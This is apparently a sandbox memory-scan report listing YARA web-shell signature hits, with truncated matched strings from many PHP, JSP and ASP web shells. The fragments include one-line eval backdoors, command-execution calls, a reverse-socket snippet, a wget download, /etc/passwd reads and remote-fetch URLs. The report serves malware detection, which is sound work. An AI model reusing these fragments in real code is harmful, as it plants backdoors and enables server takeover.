| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_wso2_5_1_wso2_5_wso2 | Web Shell - from files wso2.5.1.php, wso2.5.php, wso2.php | Florian Roth | - 0x2730c:$s7: $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selec
- 0x2735f:$s8: .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['na
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_000_403_c5_queryDong_spyjsp2010_t00ls | Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp, t00ls.jsp | Florian Roth | - 0x2759a:$s8: table.append("<td nowrap> <a href=\"#\" onclick=\"view('"+tbName+"')
- 0x275e3:$s9: "<p><input type=\"hidden\" name=\"selectDb\" value=\""+selectDb+"
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_404_data_suiyue | Web Shell - from files 404.jsp, data.jsp, suiyue.jsp | Florian Roth | - 0x27765:$s3: sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_r57shell_r57shell127_SnIpEr_SA_Shell_EgY_SpIdEr_ShElL_V2_r57_xxx | Web Shell - from files r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php | Florian Roth | - 0x27a0a:$s2: echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name
- 0x27a5b:$s3: echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1
- 0x27aac:$s9: echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_807_a_css_dm_he1p_JspSpy_xxx | Web Shell - from files 807.jsp, a.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, style.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp | Florian Roth | - 0x27f30:$s1: "<h2>Remote Control »</h2><input class=\"bt\" onclick=\"var
- 0x27f76:$s2: "<p>Current File (import new file name and new file)<br /><input class=\"inpu
- 0x27fc8:$s3: "<p>Current file (fullpath)<br /><input class=\"input\" name=\"file\" i
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_201_3_ma_download | Web Shell - from files 201.jsp, 3.jsp, ma.jsp, download.jsp | Florian Roth | - 0x28180:$s0: <input title="Upload selected file to the current working directory" type="Su
- 0x281d2:$s5: <input title="Launch command in current directory" type="Submit" class="but
- 0x28222:$s6: <input title="Delete all selected files and directories incl. subdirs" class=
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_browser_201_3_400_in_JFolder_jfolder01_jsp_leo_ma_warn_webshell_nc_download | Web Shell - from files browser.jsp, 201.jsp, 3.jsp, 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, ma.jsp, warn.jsp, webshell-nc.jsp, download.jsp | Florian Roth | - 0x2854a:$s4: UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
- 0x28587:$s5: long time = (System.currentTimeMillis() - starttime) / 1000l;
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_shell_phpspy_2006_arabicspy | Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php | Florian Roth | - 0x2871d:$s0: elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype
- 0x28772:$s8: echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"P
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_in_JFolder_jfolder01_jsp_leo_warn | Web Shell - from files in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp | Florian Roth | - 0x289a2:$s4: sbFile.append(" <a href=\"javascript:doForm('down','"+formatPath(strD
- 0x289f3:$s9: sbFile.append(" <a href=\"javascript:doForm('edit','"+formatPath(strDi
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_2_520_icesword_job_ma1_ma4_2 | Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp | Florian Roth | - 0x28c4a:$s2: private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp",
- 0x28c95:$s3: \" name=\"upFile\" size=\"8\" class=\"textbox\" /> <input typ
- 0x28cdc:$s9: if (request.getParameter("password") == null && session.getAttribute("passwor
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_phpspy_2005_full_phpspy_2005_lite_PHPSPY | Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, PHPSPY.php | Florian Roth | - 0x28e9c:$s6: <input type="text" name="command" size="60" value="<?=$_POST['comma
- 0x4b5cc:$s6: <input type="text" name="command" size="60" value="<?=$_POST['comma
- 0x28ee4:$s7: echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILE
- 0x28f35:$s8: <option value="passthru" <? if ($execfunc=="passthru") { echo "selected";
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_shell_phpspy_2006_arabicspy_hkrkoz | Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php, hkrkoz.php | Florian Roth | - 0x29112:$s5: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
- 0x4506f:$s5: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_c99_Shell_ci_Biz_was_here_c100_v_xxx | Web Shell - from files c99.php, Shell [ci | unknown | - 0x292ff:$s8: else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR"
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_2008_2009lite_2009mssql | Web Shell - from files 2008.php, 2009lite.php, 2009mssql.php | Florian Roth | - 0x29498:$s0: <a href="javascript:godir(\''.$drive->Path.'/\');
- 0x294ce:$s7: p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_shell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_arabicspy_PHPSPY_hkrkoz | Web Shell - from files shell.php, phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, arabicspy.php, PHPSPY.php, hkrkoz.php | Florian Roth | - 0x2970c:$s0: $mainpath_info = explode('/', $mainpath);
- 0x29744:$s6: if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "d
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_807_dm_JspSpyJDK5_m_cofigrue | Web Shell - from files 807.jsp, dm.jsp, JspSpyJDK5.jsp, m.jsp, cofigrue.jsp | Florian Roth | - 0x29946:$s1: url_con.setRequestProperty("REFERER", ""+fckal+"");
- 0x2997e:$s9: FileLocalUpload(uc(dx())+sxm,request.getRequestURL().toString(), "GBK");
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Dive_Shell_1_0_Emperor_Hacking_Team_xxx | Web Shell - from files Dive Shell 1.0 - Emperor Hacking Team.php, phpshell.php, SimShell 1.0 - Simorgh Security MGZ.php | Florian Roth | - 0x29af5:$s1: if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== fals
- 0x29b46:$s9: if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_404_data_in_JFolder_jfolder01_xxx | Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, suiyue.jsp, warn.jsp | Florian Roth | - 0x29d99:$s4: <TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TE
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_reverse_jsp_reverse_jspbd | Web Shell - from files jsp-reverse.jsp, jsp-reverse.jsp, jspbd.jsp | Florian Roth | - 0x29f40:$s0: osw = new BufferedWriter(new OutputStreamWriter(os));
- 0x29f7a:$s7: sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
- 0x29fbe:$s9: isr = new BufferedReader(new InputStreamReader(is));
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_400_in_JFolder_jfolder01_jsp_leo_warn_webshell_nc | Web Shell - from files 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp, webshell-nc.jsp | Florian Roth | - 0x2a253:$s0: sbFolder.append("<tr><td > </td><td>");
- 0x2a284:$s1: return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
- 0x2a2cc:$s5: FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
- 0x2a302:$s6: <input type="hidden" name="cmd" value="<%=strCmd%>">
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_2_520_job_JspWebshell_1_2_ma1_ma4_2 | Web Shell - from files 2.jsp, 520.jsp, job.jsp, JspWebshell 1.2.jsp, ma1.jsp, ma4.jsp, 2.jsp | Florian Roth | - 0x2a54f:$s1: while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
- 0x2a58f:$s6: password = (String)session.getAttribute("password");
- 0x4105b:$s6: password = (String)session.getAttribute("password");
- 0x2a5c8:$s7: insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB231
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_gfs_sh_r57shell_r57shell127_SnIpEr_SA_xxx | Web Shell - from files gfs_sh.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php | Florian Roth | - 0x2ab50:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x3b73b:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x2aba6:$s11: Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KIC
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_itsec_PHPJackal_itsecteam_shell_jHn | Web Shell - from files itsec.php, PHPJackal.php, itsecteam_shell.php, jHn.php | Florian Roth | - 0x2ad8b:$s0: $link=pg_connect("host=$host dbname=$db user=$user password=$pass");
- 0x2add4:$s6: while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|
- 0x2ae29:$s9: while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Shell_ci_Biz_was_here_c100_v_xxx | Web Shell - from files Shell [ci | unknown | - 0x2afa0:$s2: if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$stri
- 0x2afeb:$s3: <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null"
- 0x2b02a:$s4: <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
- 0x2b066:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de
- 0x5664c:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de
- 0x2b0a6:$s9: <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_NIX_REMOTE_WEB_SHELL_NIX_REMOTE_WEB_xxx1 | Web Shell - from files NIX REMOTE WEB-SHELL.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, KAdot Universal Shell v0.1.6.php | Florian Roth | - 0x2b20f:$s1: <td><input size="48" value="$docr/" name="path" type="text"><input type=
- 0x2b25c:$s2: $uploadfile = $_POST['path'].$_FILES['file']['name'];
- 0x2b296:$s6: elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
- 0x2b2ce:$s7: if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
- 0x4ac0a:$s7: if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_c99_c99shell_c99_w4cking_Shell_xxx | Web Shell - from files c99.php, c99shell.php, c99_w4cking.php, Shell [ci | unknown | - 0x2b547:$s0: echo "<b>HEXDUMP:</b><nobr>
- 0x2b567:$s4: if ($filestealth) {$stat = stat($d.$f);}
- 0x2b594:$s5: while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$r
- 0x2b5e2:$s6: if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB
- 0x2b62e:$s8: echo "<center><b>Server-status variables:</b><br><br>";
- 0x2b66a:$s9: echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz | Web Shell - from files 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php | Florian Roth | - 0x2b86b:$s0: $this -> addFile($content, $filename);
- 0x2b896:$s3: function addFile($data, $name, $time = 0) {
- 0x2b8c6:$s8: function unix2DosTime($unixtime = 0) {
- 0x2b8f1:$s9: foreach($filelist as $filename){
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_c99_c66_c99_shadows_mod_c99shell | Web Shell - from files c99.php, c66.php, c99-shadows-mod.php, c99shell.php | Florian Roth | - 0x2baa0:$s2: if (unlink(_FILE_)) {@ob_clean(); echo "Thanks for using c99shell v.".$shv
- 0x2baf1:$s3: "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
- 0x2bb3a:$s4: <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#66
- 0x2bb8d:$s7: elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources
- 0x2bbdf:$s8: "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehos
- 0x2bc2f:$s9: elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_he1p_JspSpy_nogfw_ok_style_1_JspSpy1 | Web Shell - from files he1p.jsp, JspSpy.jsp, nogfw.jsp, ok.jsp, style.jsp, 1.jsp, JspSpy.jsp | Florian Roth | - 0x2be95:$s0: ""+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+"</td>"+
- 0x2bed9:$s4: out.println("<h2>File Manager - Current disk ""+(cr.indexOf("/") == 0?
- 0x2bf29:$s7: String execute = f.canExecute() ? "checked=\"checked\"" : "";
- 0x2bf6b:$s8: "<td nowrap>"+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+"</td>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_000_403_c5_config_myxx_queryDong_spyjsp2010_zend | Web Shell - from files 000.jsp, 403.jsp, c5.jsp, config.jsp, myxx.jsp, queryDong.jsp, spyjsp2010.jsp, zend.jsp | Florian Roth | - 0x2c212:$s0: return new Double(format.format(value)).doubleValue();
- 0x2c24d:$s5: File tempF = new File(savePath);
- 0x2c272:$s9: if (tempF.isDirectory()) {
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_c99_c99shell_c99_c99shell | Web Shell - from files c99.php, c99shell.php, c99.php, c99shell.php | Florian Roth | - 0x2c40d:$s2: $bindport_pass = "c99";
- 0x2c429:$s5: else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = tr
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat | Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php | Florian Roth | - 0x2c648:$s6: $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $d
- 0x2c694:$s7: $sql1 .= $row[1]."\r\n\r\n";
- 0x2c6b5:$s8: if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
- 0x2c6f5:$s9: foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_NIX_REMOTE_WEB_SHELL_nstview_xxx | Web Shell - from files NIX REMOTE WEB-SHELL.php, nstview.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, Cyber Shell (v 1.0).php | Florian Roth | - 0x2c87d:$s3: BODY, TD, TR {
- 0x2c890:$s5: $d=str_replace("\\","/",$d);
- 0x2c8b1:$s6: if ($file=="." || $file=="..") continue;
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_000_403_807_a_c5_config_css_dm_he1p_xxx | Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp | Florian Roth | - 0x2ce60:$s3: String savePath = request.getParameter("savepath");
- 0x2ce98:$s4: URL downUrl = new URL(downFileUrl);
- 0x2cec0:$s5: if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))
- 0x2cefd:$s6: String downFileUrl = request.getParameter("url");
- 0x2cf33:$s7: FileInputStream fInput = new FileInputStream(f);
- 0x2cf68:$s8: URLConnection conn = downUrl.openConnection();
- 0x2cf9b:$s9: sis = request.getInputStream();
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_2_520_icesword_job_ma1 | Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp | Florian Roth | - 0x2d161:$s1: <meta http-equiv="Content-Type" content="text/html; charset=gb2312"></head>
- 0x2d1b1:$s3: <input type="hidden" name="_EVENTTARGET" value="" />
- 0x2d1ea:$s8: <input type="hidden" name="_EVENTARGUMENT" value="" />
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_404_data_in_JFolder_jfolder01_jsp_suiyue_warn | Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, suiyue.jsp, warn.jsp | Florian Roth | - 0x2d479:$s0: <table width="100%" border="1" cellspacing="0" cellpadding="5" bordercol
- 0x2d4c6:$s2: KB </td>
- 0x2d4d4:$s3: <table width="98%" border="0" cellspacing="0" cellpadding="
- 0x2d514:$s4: <tr align="center">
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_PHPSPY | Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, PHPSPY.php | Florian Roth | - 0x2d6e4:$s4: http://www.4ngel.net
- 0x33267:$s4: http://www.4ngel.net
- 0x4c5b5:$s4: http://www.4ngel.net
- 0x2d6fd:$s5: </a> | <a href="?action=phpenv">PHP
- 0x2d725:$s8: echo $msg=@fwrite($fp,$_POST['filecontent']) ? "
- 0x2d75a:$s9: Codz by Angel
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_c99_locus7s_c99_w4cking_xxx | Web Shell - from files c99_locus7s.php, c99_w4cking.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, acid.php, newsh.php, r57.php, Backdoor.PHP.Agent.php | Florian Roth | - 0x2da3a:$s1: $res = @shell_exec($cfe);
- 0x2da58:$s8: $res = @ob_get_contents();
- 0x2da77:$s9: @exec($cfe,$res);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_browser_201_3_ma_ma2_download | Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, ma2.jsp, download.jsp | Florian Roth | - 0x2dc69:$s1: private static final int EDITFIELD_ROWS = 30;
- 0x2dc9b:$s2: private static String tempdir = ".";
- 0x2dcc4:$s6: <input type="hidden" name="dir" value="<%=request.getAttribute("dir")%>"
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_000_403_c5_queryDong_spyjsp2010 | Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp | Florian Roth | - 0x2dec5:$s2: " <select name='encode' class='input'><option value=''>ANSI</option><option val
- 0x2df19:$s7: JSession.setAttribute("MSG","<span style='color:red'>Upload File Failed!</spa
- 0x2df6b:$s8: File f = new File(JSession.getAttribute(CURRENT_DIR)+"/"+fileBean.getFileName(
- 0x2dfbe:$s9: ((Invoker)ins.get("vd")).invoke(request,response,JSession);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_r57shell127_r57_kartal_r57 | Web Shell - from files r57shell127.php, r57_kartal.php, r57.php | Florian Roth | - 0x2e150:$s2: $handle = @opendir($dir) or die("Can't open directory $dir");
- 0x2e192:$s3: if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }
- 0x2e1e3:$s5: if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_con2 | Web shells - generated from file con2.asp | Florian Roth | - 0x2e312:$s7: ,htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => e
- 0x2e368:$s10: j "<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'><input n
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_make2 | Web shells - generated from file make2.php | Florian Roth | - 0x2e496:$s1: error_reporting(0);session_start();header("Content-type:text/html;charset=utf-8
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_aaa | Web shells - generated from file aaa.asp | Florian Roth | - 0x2e5c2:$s0: Function fvm(jwv):If jwv=""Then:fvm=jwv:Exit Function:End If:Dim tt,sru:tt="
- 0x2e613:$s5: <option value=""DROP TABLE [jnc];exec mast"&kvp&"er..xp_regwrite 'HKEY_LOCAL
- 0x2e665:$s17: if qpv="" then qpv="x:\Program Files\MySQL\MySQL Server 5.0\my.ini"&br&
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Expdoor_com_ASP | Web shells - generated from file Expdoor.com ASP.asp | Florian Roth | - 0x2e793:$s4: ">www.Expdoor.com</a>
- 0x2e7ad:$s5: <input name="FileName" type="text" value="Asp_ver.Asp" size="20" max
- 0x2e7fb:$s10: set file=fs.OpenTextFile(server.MapPath(FileName),8,True) '
- 0x2e83d:$s14: set fs=server.CreateObject("Scripting.FileSystemObject") '
- 0x2e87f:$s16: <TITLE>Expdoor.com ASP
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_php2 | Web shells - generated from file php2.php | Florian Roth | - 0x2e974:$s0: <?php $s=@$_GET[2];if(md5($s.$s)==
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_bypass_iisuser_p | Web shells - generated from file bypass-iisuser-p.asp | Florian Roth | - 0x2ea7f:$s0: <%Eval(Request(chr(112))):Set fso=CreateObject
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_sig_404super | Web shells - generated from file 404super.php | Florian Roth | - 0x2eb8a:$s4: $i = pack('c*', 0x70, 0x61, 99, 107);
- 0x2ebb4:$s6: 'h' => $i('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),
- 0x2ec05:$s7: //http://require.duapp.com/session.php
- 0x2ec30:$s8: if(!isset($_SESSION['t'])){$_SESSION['t'] = $GLOBALS['f']($GLOBALS['h']);}
- 0x2ec80:$s12: //define('pass','123456');
- 0x2eca0:$s13: $GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSIO
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_JSP | Web shells - generated from file JSP.jsp | Florian Roth | - 0x2edcd:$s1: void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i
- 0x2ee22:$s5: bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.app
- 0x2ee74:$s11: if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequest
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshell_123 | Web shells - generated from file webshell-123.php | Florian Roth | - 0x2efa3:$s0: // Web Shell!!
- 0x2efb6:$s1: @preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6
- 0x2effd:$s3: $default_charset = "UTF-8";
- 0x2f01d:$s4: // url:http://www.weigongkai.com/shell/
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_dev_core | Web shells - generated from file dev_core.php | Florian Roth | - 0x2f11d:$s1: if (strpos($_SERVER['HTTP_USER_AGENT'], 'EBSD') == false) {
- 0x2f15d:$s9: setcookie('key', $_POST['pwd'], time() + 3600 * 24 * 30);
- 0x2f19c:$s10: $_SESSION['code'] = _REQUEST(sprintf("%s?%s",pack("H*",'6874
- 0x2f1de:$s11: if (preg_match("/^HTTP\/\d\.\d\s([\d]+)\s.*$/", $status, $matches))
- 0x2f227:$s12: eval(gzuncompress(gzuncompress(Crypt::decrypt($_SESSION['code'], $_C
- 0x2f271:$s15: if (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_pHp | Web shells - generated from file pHp.php | Florian Roth | - 0x2f39a:$s0: if(is_readable($path)) antivirus($path.'/',$exs,$matches);
- 0x2f3d9:$s1: '/(eval|assert|include|require|include\_once|require\_once|array\_map|arr
- 0x2f428:$s13: '/(exec|shell\_exec|system|passthru)+\s*\(\s*\$\_(\w+)\[(.*)\]\s*
- 0x2f46f:$s14: '/(include|require|include\_once|require\_once)+\s*\(\s*[\'|\"](\w+
- 0x2f4b8:$s19: '/\$\_(\w+)(.*)(eval|assert|include|require|include\_once|require\_once
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_pppp | Web shells - generated from file pppp.php | Florian Roth | - 0x2f5de:$s0: Mail: chinese@hackermail.com
- 0x2f5ff:$s3: if($_GET["hackers"]=="2b"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo
- 0x2f650:$s6: Site: http://blog.weili.me
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_code | Web shells - generated from file code.php | Florian Roth | - 0x2f749:$s1: <a class="high2" href="javascript:;;;" name="action=show&dir=$_ipage_fi
- 0x2f795:$s7: $file = !empty($_POST["dir"]) ? urldecode(self::convert_to_utf8(rtrim($_PO
- 0x2f7e5:$s10: if (true==@move_uploaded_file($_FILES['userfile']['tmp_name'],self::convert_
- 0x2f837:$s14: Processed in <span id="runtime"></span> second(s) {gzip} usage:
- 0x2f87c:$s17: <a href="javascript:;;;" name="{return_link}" onclick="fileperm
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_jspyyy | Web shells - generated from file jspyyy.jsp | Florian Roth | - 0x2f99e:$s0: <%@page import="java.io.*"%><%if(request.getParameter("f")
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_xxxx | Web shells - generated from file xxxx.php | Florian Roth | - 0x2fab7:$s0: <?php eval($_POST[1]);?>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_JJjsp3 | Web shells - generated from file JJjsp3.jsp | Florian Roth | - 0x2fbb4:$s0: <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%><%!S
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_PHP1 | Web shells - generated from file PHP1.php | Florian Roth | - 0x2fce1:$s0: <[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?>
- 0x2fd2c:$s2: :https://forum.90sec.org/forum.php?mod=viewthread&tid=7316
